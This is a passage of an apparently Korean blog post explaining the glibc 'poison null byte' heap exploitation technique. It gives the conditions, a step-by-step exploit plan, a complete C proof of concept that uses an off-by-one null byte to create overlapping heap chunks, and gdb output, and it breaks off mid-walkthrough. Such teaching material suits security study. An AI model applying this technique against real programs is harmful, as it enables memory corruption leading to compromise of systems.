<!DOCTYPE html><html lang="en-US" ><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><meta name="generator" content="Jekyll v4.2.0" /><meta property="og:title" content="Poison Null Byte" /><meta name="author" content="Beomsu Lee" /><meta property="og:locale" content="en_US" /><meta name="description" content="Conditions" /><meta property="og:description" content="Conditions" /><link rel="canonical" href="https://beomsu317.github.io/posts/poison-null-byte/" /><meta property="og:url" content="https://beomsu317.github.io/posts/poison-null-byte/" /><meta property="og:site_name" content="BS Blog" /><meta property="og:type" content="article" /><meta property="article:published_time" content="2020-03-12T00:00:00+09:00" /><meta name="twitter:card" content="summary" /><meta property="twitter:title" content="Poison Null Byte" /><meta name="twitter:site" content="@" /><meta name="twitter:creator" content="@Beomsu Lee" /><meta name="google-site-verification" content="google_meta_tag_verification" /> <script type="application/ld+json"> {"description":"Conditions","url":"https://beomsu317.github.io/posts/poison-null-byte/","@type":"BlogPosting","headline":"Poison Null Byte","dateModified":"2020-03-12T00:00:00+09:00","datePublished":"2020-03-12T00:00:00+09:00","mainEntityOfPage":{"@type":"WebPage","@id":"https://beomsu317.github.io/posts/poison-null-byte/"},"author":{"@type":"Person","name":"Beomsu Lee"},"@context":"https://schema.org"}</script><title>Poison Null Byte | BS Blog</title><link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-touch-icon.png"><link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png"><link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png"><link rel="manifest" href="/assets/img/favicons/site.webmanifest"><link rel="shortcut icon" href="/assets/img/favicons/favicon.ico"><meta name="apple-mobile-web-app-title" content="BS Blog"><meta name="application-name" content="BS Blog"><meta name="msapplication-TileColor" content="#da532c"><meta name="msapplication-config" content="/assets/img/favicons/browserconfig.xml"><meta name="theme-color" content="#ffffff"><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="anonymous"><link rel="dns-prefetch" href="https://fonts.gstatic.com"><link rel="preconnect" href="https://www.google-analytics.com" crossorigin="use-credentials"><link rel="dns-prefetch" href="https://www.google-analytics.com"><link rel="preconnect" href="https://www.googletagmanager.com" crossorigin="anonymous"><link rel="dns-prefetch" href="https://www.googletagmanager.com"><link rel="preconnect" href="https://cdn.jsdelivr.net"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css"><link rel="stylesheet" href="/assets/css/style.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/magnific-popup@1.1.0/dist/magnific-popup.min.css"> <script src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"></script><body data-spy="scroll" data-target="#toc"><div id="sidebar" class="d-flex flex-column align-items-end"><div class="profile-wrapper text-center"><div id="avatar"> <a href="/" alt="avatar" class="mx-auto"> <img src="/assets/img/me.png" alt="avatar" onerror="this.style.display='none'"> </a></div><div class="site-title mt-3"> <a href="/">BS Blog</a></div><div class="site-subtitle font-italic">research & development</div></div><ul class="w-100"><li class="nav-item"> <a href="/" class="nav-link"> <i class="fa-fw fas fa-home ml-xl-3 mr-xl-3 unloaded"></i> <span>HOME</span> </a><li class="nav-item"> <a href="/categories/" class="nav-link"> <i class="fa-fw fas fa-stream ml-xl-3 mr-xl-3 unloaded"></i> <span>CATEGORIES</span> </a><li class="nav-item"> <a href="/tags/" class="nav-link"> <i class="fa-fw fas fa-tags ml-xl-3 mr-xl-3 unloaded"></i> <span>TAGS</span> </a><li class="nav-item"> <a href="/archives/" class="nav-link"> <i class="fa-fw fas fa-archive ml-xl-3 mr-xl-3 unloaded"></i> <span>ARCHIVES</span> </a><li class="nav-item"> <a href="/about/" class="nav-link"> <i class="fa-fw fas fa-info ml-xl-3 mr-xl-3 unloaded"></i> <span>ABOUT</span> </a></ul><div class="sidebar-bottom mt-auto d-flex flex-wrap justify-content-center"> <a href="https://github.com/beomsu317" aria-label="github" class="order-3" target="_blank" rel="noopener"> <i class="fab fa-github-alt"></i> </a> <a href="https://twitter.com/" aria-label="twitter" class="order-4" target="_blank" rel="noopener"> <i class="fab fa-twitter"></i> </a> <a href=" javascript:location.href = 'mailto:' + ['beomsu317','gmail.com'].join('@')" aria-label="email" class="order-5" > <i class="fas fa-envelope"></i> </a> <a href="/feed.xml" aria-label="rss" class="order-6" > <i class="fas fa-rss"></i> </a> <span class="icon-border order-2"></span> <span id="mode-toggle-wrapper" class="order-1"> <i class="mode-toggle fas fa-adjust"></i> <script type="text/javascript"> class ModeToggle { static get MODE_KEY() { return "mode"; } static get DARK_MODE() { return "dark"; } static get LIGHT_MODE() { return "light"; } constructor() { if (this.hasMode) { if (this.isDarkMode) { if (!this.isSysDarkPrefer) { this.setDark(); } } else { if (this.isSysDarkPrefer) { this.setLight(); } } } var self = this; /* always follow the system prefers */ this.sysDarkPrefers.addListener(function() { if (self.hasMode) { if (self.isDarkMode) { if (!self.isSysDarkPrefer) { self.setDark(); } } else { if (self.isSysDarkPrefer) { self.setLight(); } } self.clearMode(); } self.updateMermaid(); }); } /* constructor() */ setDark() { $('html').attr(ModeToggle.MODE_KEY, ModeToggle.DARK_MODE); sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.DARK_MODE); } setLight() { $('html').attr(ModeToggle.MODE_KEY, ModeToggle.LIGHT_MODE); sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.LIGHT_MODE); } clearMode() { $('html').removeAttr(ModeToggle.MODE_KEY); sessionStorage.removeItem(ModeToggle.MODE_KEY); } get sysDarkPrefers() { return window.matchMedia("(prefers-color-scheme: dark)"); } get isSysDarkPrefer() { return this.sysDarkPrefers.matches; } get isDarkMode() { return this.mode == ModeToggle.DARK_MODE; } get isLightMode() { return this.mode == ModeToggle.LIGHT_MODE; } get hasMode() { return this.mode != null; } get mode() { return sessionStorage.getItem(ModeToggle.MODE_KEY); } /* get the current mode on screen */ get modeStatus() { if (this.isDarkMode || (!this.hasMode && this.isSysDarkPrefer) ) { return ModeToggle.DARK_MODE; } else { return ModeToggle.LIGHT_MODE; } } updateMermaid() { if (typeof mermaid !== "undefined") { let expectedTheme = (this.modeStatus === ModeToggle.DARK_MODE? "dark" : "default"); let config = { theme: expectedTheme }; /* re-render the SVG › <https://github.com/mermaid-js/mermaid/issues/311#issuecomment-332557344> */ $(".mermaid").each(function() { let svgCode = $(this).prev().children().html(); $(this).removeAttr("data-processed"); $(this).html(svgCode); }); mermaid.initialize(config); mermaid.init(undefined, ".mermaid"); } } flipMode() { if (this.hasMode) { if (this.isSysDarkPrefer) { if (this.isLightMode) { this.clearMode(); } else { this.setLight(); } } else { if (this.isDarkMode) { this.clearMode(); } else { this.setDark(); } } } else { if (this.isSysDarkPrefer) { this.setLight(); } else { this.setDark(); } } this.updateMermaid(); } /* flipMode() */ } /* ModeToggle */ let toggle = new ModeToggle(); $(".mode-toggle").click(function() { toggle.flipMode(); }); </script> </span></div></div><div id="topbar-wrapper" class="row justify-content-center topbar-down"><div id="topbar" class="col-11 d-flex h-100 align-items-center justify-content-between"> <span id="breadcrumb"> <span> <a href="/"> Posts </a> </span> <span>Poison Null Byte</span> </span> <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i><div id="topbar-title"> Post</div><i id="search-trigger" class="fas fa-search fa-fw"></i> <span id="search-wrapper" class="align-items-center"> <i class="fas fa-search fa-fw"></i> <input class="form-control" id="search-input" type="search" aria-label="search" autocomplete="off" placeholder="Search..."> <i class="fa fa-times-circle fa-fw" id="search-cleaner"></i> </span> <span id="search-cancel" >Cancel</span></div></div><div id="main-wrapper"><div id="main"><div class="row"><div id="post-wrapper" class="col-12 col-lg-11 col-xl-8"><div class="post pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><h1 data-toc-skip>Poison Null Byte</h1><div class="post-meta text-muted d-flex flex-column"><div> <span class="semi-bold"> Beomsu Lee </span> <span class="timeago " data-toggle="tooltip" data-placement="bottom" title="Thu, Mar 12, 2020, 12:00 AM +0900" prep="on" > Mar 12, 2020 <i class="unloaded">2020-03-12T00:00:00+09:00</i> </span></div><div> <span class="readtime" data-toggle="tooltip" data-placement="bottom" title="1567 words">8 min</span></div></div><div class="post-content"><h2 id="conditions">Conditions</h2><ul><li>공격자에 의해 다음과 같은 heap 영역을 할당, 해제할 수 있어야 함<ul><li>0x200 이상의 heap 영역<li>fast bin 이상의 heap 영역(heap size : 0x80 이상)</ul><li>공격자에 의해 free chunk의 size 영역에 1 byte를 Null로 변경할 수 있어야 함<li>공격자에 의해 free chunk의 size보다 작은 heap 영역을 2개 할당할 수 있어야 하며 fast chunk는 사용할 수 없음</ul><h2 id="exploit-plan">Exploit plan</h2><ol><li>3개의 heap 영역 할당(<code class="language-plaintext highlighter-rouge">heap1</code>, <code class="language-plaintext highlighter-rouge">heap2</code>, <code class="language-plaintext highlighter-rouge">heap3</code>)<li><code class="language-plaintext highlighter-rouge">heap2</code> 영역(<code class="language-plaintext highlighter-rouge">heap2</code> 주소 + <code class="language-plaintext highlighter-rouge">heap2</code> size(null로 변조한 heap size))에 1 byte를 null로 변조한 값을 저장<li><code class="language-plaintext highlighter-rouge">heap2</code> 영역 해제<li>free chunk의 <code class="language-plaintext highlighter-rouge">size</code> 영역에 1 byte를 null로 변조<li>변경된 free chunk 영역 안에서 생성 가능한 크기의 heap 영역 2개 할당(<code class="language-plaintext highlighter-rouge">heap4</code>, <code class="language-plaintext highlighter-rouge">heap5</code>)<li><code class="language-plaintext highlighter-rouge">heap4</code> 영역 해제<li><code class="language-plaintext highlighter-rouge">heap3</code> 영역 해제<li><code class="language-plaintext highlighter-rouge">heap4 + heap5</code> 이상의 heap 영역 할당<ul><li>할당 받은 영역으로 인해 <code class="language-plaintext highlighter-rouge">heap5</code> 영역의 값을 덮어쓸 수 있음</ul></ol><h2 id="proof-of-concept">Proof of concept</h2><div lang="c" class="language-c highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
</pre><td class="rouge-code"><pre><span class="cp">#include &lt;stdio.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;string.h&gt;
#include &lt;stdint.h&gt;
#include &lt;malloc.h&gt;
</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">()</span>
<span class="p">{</span>
    <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Welcome to poison null byte 2.0!</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Tested in Ubuntu 14.04 64bit.</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"This technique only works with disabled tcache-option for glibc, see build_glibc.sh for build instructions.</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"This technique can be used when you have an off-by-one into a malloc'ed region with a null byte.</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>

    <span class="kt">uint8_t</span><span class="o">*</span> <span class="n">a</span><span class="p">;</span>
    <span class="kt">uint8_t</span><span class="o">*</span> <span class="n">b</span><span class="p">;</span>
    <span class="kt">uint8_t</span><span class="o">*</span> <span class="n">c</span><span class="p">;</span>
    <span class="kt">uint8_t</span><span class="o">*</span> <span class="n">b1</span><span class="p">;</span>
    <span class="kt">uint8_t</span><span class="o">*</span> <span class="n">b2</span><span class="p">;</span>
    <span class="kt">uint8_t</span><span class="o">*</span> <span class="n">d</span><span class="p">;</span>
    <span class="kt">void</span> <span class="o">*</span><span class="n">barrier</span><span class="p">;</span>

    <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"We allocate 0x100 bytes for 'a'.</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="n">a</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint8_t</span><span class="o">*</span><span class="p">)</span> <span class="n">malloc</span><span class="p">(</span><span class="mh">0x100</span><span class="p">);</span>
    <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"a: %p</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">a</span><span class="p">);</span>
    <span class="kt">int</span> <span class="n">real_a_size</span> <span class="o">=</span> <span class="n">malloc_usable_size</span><span class="p">(</span><span class="n">a</span><span class="p">);</span>
    <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Since we want to overflow 'a', we need to know the 'real' size of 'a' "</span>
        <span class="s">"(it may be more than 0x100 because of rounding): %#x</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">real_a_size</span><span class="p">);</span>

    <span class="cm">/* chunk size attribute cannot have a least significant byte with a value of 0x00.
     * the least significant byte of this will be 0x10, because the size of the chunk includes
     * the amount requested plus some amount required for the metadata. */</span>
    <span class="n">b</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint8_t</span><span class="o">*</span><span class="p">)</span> <span class="n">malloc</span><span class="p">(</span><span class="mh">0x200</span><span class="p">);</span>

    <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"b: %p</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">b</span><span class="p">);</span>

    <span class="n">c</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint8_t</span><span class="o">*</span><span class="p">)</span> <span class="n">malloc</span><span class="p">(</span><span class="mh">0x100</span><span class="p">);</span>
    <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"c: %p</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">c</span><span class="p">);</span>

    <span class="n">barrier</span> <span class="o">=</span>  <span class="n">malloc</span><span class="p">(</span><span class="mh">0x100</span><span class="p">);</span>
    <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"We allocate a barrier at %p, so that c is not consolidated with the top-chunk when freed.</span><span class="se">\n</span><span class="s">"</span>
        <span class="s">"The barrier is not strictly necessary, but makes things less confusing</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">barrier</span><span class="p">);</span>

    <span class="kt">uint64_t</span><span class="o">*</span> <span class="n">b_size_ptr</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint64_t</span><span class="o">*</span><span class="p">)(</span><span class="n">b</span> <span class="o">-</span> <span class="mi">8</span><span class="p">);</span>

    <span class="c1">// added fix for size==prev_size(next_chunk) check in newer versions of glibc</span>
    <span class="c1">// https://sourceware.org/git/?p=glibc.git;a=commitdiff;h=17f487b7afa7cd6c316040f3e6c86dc96b2eec30</span>
    <span class="c1">// this added check requires we are allowed to have null pointers in b (not just a c string)</span>
    <span class="c1">//*(size_t*)(b+0x1f0) = 0x200;</span>
    <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"In newer versions of glibc we will need to have our updated size inside b itself to pass "</span>
        <span class="s">"the check 'chunksize(P) != prev_size (next_chunk(P))'</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="c1">// we set this location to 0x200 since 0x200 == (0x211 &amp; 0xff00)</span>
    <span class="c1">// which is the value of b.size after its first byte has been overwritten with a NULL byte</span>
    <span class="o">*</span><span class="p">(</span><span class="kt">size_t</span><span class="o">*</span><span class="p">)(</span><span class="n">b</span><span class="o">+</span><span class="mh">0x1f0</span><span class="p">)</span> <span class="o">=</span> <span class="mh">0x200</span><span class="p">;</span>

    <span class="c1">// this technique works by overwriting the size metadata of a free chunk</span>
    <span class="n">free</span><span class="p">(</span><span class="n">b</span><span class="p">);</span>
    
    <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"b.size: %#lx</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="o">*</span><span class="n">b_size_ptr</span><span class="p">);</span>
    <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"b.size is: (0x200 + 0x10) | prev_in_use</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"We overflow 'a' with a single null byte into the metadata of 'b'</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="n">a</span><span class="p">[</span><span class="n">real_a_size</span><span class="p">]</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="c1">// &lt;--- THIS IS THE "EXPLOITED BUG"</span>
    <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"b.size: %#lx</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="o">*</span><span class="n">b_size_ptr</span><span class="p">);</span>

    <span class="kt">uint64_t</span><span class="o">*</span> <span class="n">c_prev_size_ptr</span> <span class="o">=</span> <span class="p">((</span><span class="kt">uint64_t</span><span class="o">*</span><span class="p">)</span><span class="n">c</span><span class="p">)</span><span class="o">-</span><span class="mi">2</span><span class="p">;</span>
    <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"c.prev_size is %#lx</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="o">*</span><span class="n">c_prev_size_ptr</span><span class="p">);</span>

    <span class="c1">// This malloc will result in a call to unlink on the chunk where b was.</span>
    <span class="c1">// The added check (commit id: 17f487b), if not properly handled as we did before,</span>
    <span class="c1">// will detect the heap corruption now.</span>
    <span class="c1">// The check is this: chunksize(P) != prev_size (next_chunk(P)) where</span>
    <span class="c1">// P == b-0x10, chunksize(P) == *(b-0x10+0x8) == 0x200 (was 0x210 before the overflow)</span>
    <span class="c1">// next_chunk(P) == b-0x10+0x200 == b+0x1f0</span>
    <span class="c1">// prev_size (next_chunk(P)) == *(b+0x1f0) == 0x200</span>
    <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"We will pass the check since chunksize(P) == %#lx == %#lx == prev_size (next_chunk(P))</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span>
        <span class="o">*</span><span class="p">((</span><span class="kt">size_t</span><span class="o">*</span><span class="p">)(</span><span class="n">b</span><span class="o">-</span><span class="mh">0x8</span><span class="p">)),</span> <span class="o">*</span><span class="p">(</span><span class="kt">size_t</span><span class="o">*</span><span class="p">)(</span><span class="n">b</span><span class="o">-</span><span class="mh">0x10</span> <span class="o">+</span> <span class="o">*</span><span class="p">((</span><span class="kt">size_t</span><span class="o">*</span><span class="p">)(</span><span class="n">b</span><span class="o">-</span><span class="mh">0x8</span><span class="p">))));</span>
    <span class="n">b1</span> <span class="o">=</span> <span class="n">malloc</span><span class="p">(</span><span class="mh">0x100</span><span class="p">);</span>

    <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"b1: %p</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="n">b1</span><span class="p">);</span>
    <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Now we malloc 'b1'. It will be placed where 'b' was. "</span>
        <span class="s">"At this point c.prev_size should have been updated, but it was not: %#lx</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="o">*</span><span class="n">c_prev_size_ptr</span><span class="p">);</span>
    <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Interestingly, the updated value of c.prev_size has been written 0x10 bytes "</span>
        <span class="s">"before c.prev_size: %lx</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="o">*</span><span class="p">(((</span><span class="kt">uint64_t</span><span class="o">*</span><span class="p">)</span><span class="n">c</span><span class="p">)</span><span class="o">-</span><span class="mi">4</span><span class="p">));</span>
    <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"We malloc 'b2', our 'victim' chunk.</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="c1">// Typically b2 (the victim) will be a structure with valuable pointers that we want to control</span>

    <span class="n">b2</span> <span class="o">=</span> <span class="n">malloc</span><span class="p">(</span><span class="mh">0x80</span><span class="p">);</span>
    <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"b2: %p</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="n">b2</span><span class="p">);</span>

    <span class="n">memset</span><span class="p">(</span><span class="n">b2</span><span class="p">,</span><span class="sc">'B'</span><span class="p">,</span><span class="mh">0x80</span><span class="p">);</span>
    <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Current b2 content:</span><span class="se">\n</span><span class="s">%s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="n">b2</span><span class="p">);</span>

    <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Now we free 'b1' and 'c': this will consolidate the chunks 'b1' and 'c' (forgetting about 'b2').</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>

    <span class="n">free</span><span class="p">(</span><span class="n">b1</span><span class="p">);</span>
    <span class="n">free</span><span class="p">(</span><span class="n">c</span><span class="p">);</span>
    
    <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Finally, we allocate 'd', overlapping 'b2'.</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="n">d</span> <span class="o">=</span> <span class="n">malloc</span><span class="p">(</span><span class="mh">0x300</span><span class="p">);</span>
    <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"d: %p</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="n">d</span><span class="p">);</span>
    
    <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Now 'd' and 'b2' overlap.</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="n">memset</span><span class="p">(</span><span class="n">d</span><span class="p">,</span><span class="sc">'D'</span><span class="p">,</span><span class="mh">0x300</span><span class="p">);</span>

    <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"New b2 content:</span><span class="se">\n</span><span class="s">%s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="n">b2</span><span class="p">);</span>

    <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Thanks to https://www.contextis.com/resources/white-papers/glibc-adventures-the-forgotten-chunks"</span>
        <span class="s">"for the clear explanation of this technique.</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="p">}</span>
</pre></table></code></div></div><p><code class="language-plaintext highlighter-rouge">a(0x100)</code>, <code class="language-plaintext highlighter-rouge">b(0x200)</code>, <code class="language-plaintext highlighter-rouge">c(0x100)</code> heap 영역 할당한다.</p><div lang="plaintext" class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
</pre><td class="rouge-code"><pre>Welcome to poison null byte 2.0!
Tested in Ubuntu 14.04 64bit.
This technique only works with disabled tcache-option for glibc, see build_glibc.sh for build instructions.
This technique can be used when you have an off-by-one into a malloc'ed region with a null byte.
We allocate 0x100 bytes for 'a'.
a: 0x603010
Since we want to overflow 'a', we need to know the 'real' size of 'a' (it may be more than 0x100 because of rounding): 0x108
b: 0x603120
c: 0x603330
</pre></table></code></div></div><p>top chunk와 병합되지 않도록 barrier heap 영역 할당한다.</p><div lang="plaintext" class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre>We allocate a barrier at 0x603440, so that c is not consolidated with the top-chunk when freed.
The barrier is not strictly necessary, but makes things less confusing
</pre></table></code></div></div><p>b + 0x200 위치에 0x200(heap) 저장한다.</p><ul><li>0x603110 + 0x200 = 0x603310</ul><div lang="plaintext" class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>In newer versions of glibc we will need to have our updated size inside b itself to pass the check 'chunksize(P) != prev_size (next_chunk(P))'
</pre></table></code></div></div><div lang="plaintext" class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre><td class="rouge-code"><pre>gdb-peda$ p 0x603110 + 0x200
$1 = 0x603310
gdb-peda$ x/24gx 0x603310
0x603310:   0x0000000000000200  0x0000000000000000
</pre></table></code></div></div><p>off-by-one을 통해 <code class="language-plaintext highlighter-rouge">b</code>의 <code class="language-plaintext highlighter-rouge">size</code>를 변조한다.</p><div lang="plaintext" class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
</pre><td class="rouge-code"><pre>b.size: 0x211
b.size is: (0x200 + 0x10) | prev_in_use
We overflow 'a' with a single null byte into the metadata of 'b'
b.size: 0x200
c.prev_size is 0x210
</pre></table></code></div></div><p><code class="language-plaintext highlighter-rouge">b1</code>을 0x100 할당 시 <code class="language-plaintext highlighter-rouge">b</code>영역에 재할당(0x603110)한다. <code class="language-plaintext highlighter-rouge">b2</code>를 0x80 만큼 할당 시 <code class="language-plaintext highlighter-rouge">b</code>영역에 재할당(0x603110 + 0x110)한다. <code class="language-plaintext highlighter-rouge">b2</code>에 <code class="language-plaintext highlighter-rouge">memset()</code>을 통해 <code class="language-plaintext highlighter-rouge">B</code>를 저장한다.</p><div lang="plaintext" class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
</pre><td class="rouge-code"><pre>We will pass the check since chunksize(P) == 0x200 == 0x200 == prev_size (next_chunk(P))
b1: 0x603120
Now we malloc 'b1'. It will be placed where 'b' was. At this point c.prev_size should have been updated, but it was not: 0x210
Interestingly, the updated value of c.prev_size has been written 0x10 bytes before c.prev_size: f0
We malloc 'b2', our 'victim' chunk.
b2: 0x603230
Current b2 content:
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
</pre></table></code></div></div><p><code class="language-plaintext highlighter-rouge">b1</code>을 <code class="language-plaintext highlighter-rouge">free()</code>한다. <code class="language-plaintext highlighter-rouge">c</code>를 <code class="language-plaintext highlighter-rouge">free()</code>하면 <code class="language-plaintext highlighter-rouge">c</code>의 <code class="language-plaintext highlighter-rouge">prev_size</code>를 확인하는데 이 때 0x210으로 되어 있어 <code class="language-plaintext highlighter-rouge">c - 0x210</code> 위치를 확인하여 free chunk인지 확인한다. <code class="language-plaintext highlighter-rouge">b1</code>을 <code class="language-plaintext highlighter-rouge">free()</code> 했기 때문에 free 된 영역으로 인식하여 <code class="language-plaintext highlighter-rouge">b1</code>과 <code class="language-plaintext highlighter-rouge">c</code>를 병합하게 된다.</p><div lang="plaintext" class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>Now we free 'b1' and 'c': this will consolidate the chunks 'b1' and 'c' (forgetting about 'b2').
</pre></table></code></div></div><p><code class="language-plaintext highlighter-rouge">b1</code>과 <code class="language-plaintext highlighter-rouge">c</code>가 병합(0x603110)되어 0x320이 되었다.</p><div lang="plaintext" class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
</pre><td class="rouge-code"><pre>gdb-peda$ parseheap
addr                prev                size                 status              fd                bk                
0x603000            0x0                 0x110                Used                None              None
0x603110            0x0                 0x320                Freed           0x6032b0    0x7ffff7dd1b78
0x603430            0x320               0x110                Used                None              None
